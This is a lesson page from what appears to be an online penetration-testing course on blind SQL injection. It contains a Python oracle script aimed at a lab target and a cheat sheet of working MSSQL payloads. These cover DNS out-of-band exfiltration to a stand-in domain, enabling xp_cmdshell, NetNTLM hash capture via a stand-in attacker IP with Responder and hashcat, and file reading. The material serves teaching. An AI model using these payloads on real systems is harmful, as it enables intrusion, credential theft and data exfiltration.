Blind SQL Injection

Designing the Oracle

Theory

We want to write a script that will exploit the blind SQLi we found to dump the password of a target user. Our first step is to design an oracle that we can send queries to and receive either true or false.

Let's say we want to evaluate a basic query (q). Since we know the username maria exists in the system, we can add ' AND q-- - to see if our target query evaluates as true or false. This works because we know the server should result status:taken for maria and so if it remains status:taken then it means q is evaluated as true, and if it returns status:available then it means q evaluated as false.

SELECT Username FROM Users WHERE Username = 'maria' AND q-- -'

For example, to test the query 1=1 we can inject maria' AND 1=1-- - and receive the result status:taken which indicates the server evaluated it as true.

Likewise, we can test the query 1=0 by injecting maria' AND 1=0-- - and receive the response status:available indicating the server evaluated it as false.

Note: We must use a username that is already taken, like maria for this web app or any other user we register. This is so a query that returns true would give us taken. Otherwise, if we use a username that is not taken, then the output of any query would be available, whether it's true or false.

Practice

In Python, we can script this as follows. The function oracle(q) URL-encodes our payload (maria' AND (q)-- -), and then sends it in a GET request to api/check-username.php. Upon receiving the response, it checks if the value of status is taken or available, indicating true or false query evaluations respectively.

#!/usr/bin/python3

import requests
import json
import sys
from urllib.parse import quote_plus

# The user we are targeting
target = "maria"

# Checks if query `q` evaluates as `true` or `false`
def oracle(q):
    p = quote_plus(f"{target}' AND ({q})-- -")
    r = requests.get(
        f"http://192.168.43.37/api/check-username.php?u={p}"
    )
    j = json.loads(r.text)
    return j['status'] == 'taken'

# Check if oracle evalutes `1=1` and `1=0` as expected
assert oracle("1=1")
assert not oracle("1=0")

Question

Use the oracle to figure out the number of rows in the user table. You can use the query below as a base:

(select count(*) from users) > 0

VPN Servers

Warning: Each time you "Switch", your connection keys are regenerated and you must re-download your VPN connection file.

All VM instances associated with the old VPN Server will be terminated when switching to a new VPN server.
Existing PwnBox instances will automatically switch to the new VPN server.

PROTOCOL

UDP 1337

TCP 443

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

Download VPN Connection File

+ 5 Use the oracle to figure out the number of rows in the 'users' table. You can use the query listed above under the 'Question' heading as a base.

+10 Streak pts

Previous Next

Go to Questions

Tools of the Trade

Preventing SQL Injection Vulnerabilities

Defending against SQL Injection

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

Boolean-based

' AND 1=1;--

Time-based

'; IF (1=1) WAITFOR DELAY '0:0:10';--

DNS OOB

SQL Function	SQL Query
`master..xp_dirtree`	`DECLARE @T varchar(1024);SELECT @T=(SELECT 1234);EXEC('master..xp_dirtree "\\'+@T+'.YOUR.DOMAIN\\x"');`
`master..xp_fileexist`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);EXEC('master..xp_fileexist "\\'+@T+'.YOUR.DOMAIN\\x"');`
`master..xp_subdirs`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);EXEC('master..xp_subdirs "\\'+@T+'.YOUR.DOMAIN\\x"');`
`sys.dm_os_file_exists`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);SELECT * FROM sys.dm_os_file_exists('\\'+@T+'.YOUR.DOMAIN\x');`
`fn_trace_gettable`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);SELECT * FROM fn_trace_gettable('\\'+@T+'.YOUR.DOMAIN\x.trc',DEFAULT);`
`fn_get_audit_file`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);SELECT * FROM fn_get_audit_file('\\'+@T+'.YOUR.DOMAIN\',DEFAULT,DEFAULT);`
`split result into sub-domains`	`DECLARE @T VARCHAR(MAX); DECLARE @A VARCHAR(63); DECLARE @B VARCHAR(63); SELECT @T=CONVERT(VARCHAR(MAX), CONVERT(VARBINARY(MAX), flag), 1) from flag; SELECT @A=SUBSTRING(@T,3,63); SELECT @B=SUBSTRING(@T,3+63,63); SELECT * FROM fn_get_audit_file('\\'+@A+'.'+@B+'.YOUR.DOMAIN\',DEFAULT,DEFAULT);`

[MSSQL] RCE

-- Check if we are sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');

-- Enable 'Advanced Options'
EXEC sp_configure 'Show Advanced Options', '1';
RECONFIGURE;

-- Enable 'xp_cmdshell'
EXEC sp_configure 'xp_cmdshell', '1';
RECONFIGURE;

-- Ping ourselves
EXEC xp_cmdshell 'ping /n 4 192.168.43.164';

[MSSQL] NetNTLM

[!bash!]$ sudo python3 Responder.py -I eth0

EXEC master..xp_dirtree '\\<ATTACKER_IP>\myshare', 1, 1;

[!bash!]$ hashcat -m 5600 'jason::SQL01:bd7f162c24a39a0f:94DF80C5ABB...SNIP...000000' /usr/share/wordlists/rockyou.txt

[MSSQL] File Read

-- Check if we have the permissions needed to read files
SELECT COUNT(*) FROM fn_my_permissions(NULL, 'DATABASE') WHERE permission_name = 'ADMINISTER BULK OPERATIONS' OR permission_name = 'ADMINISTER DATABASE BULK OPERATIONS';

-- Get the length of a file
SELECT LEN(BulkColumn) FROM OPENROWSET(BULK '<path>', SINGLE_CLOB) AS x

-- Get the contents of a file
SELECT BulkColumn FROM OPENROWSET(BULK '<path>', SINGLE_CLOB) AS x

Blind SQL Injection

Designing the Oracle

Theory

Practice

Question

Questions

Table of Contents

Introduction

Boolean-based SQLi

Time-based SQLi

MSSQL-specific Attacks

Tools of the Trade

Preventing SQL Injection Vulnerabilities

Skills Assessment

My Workstation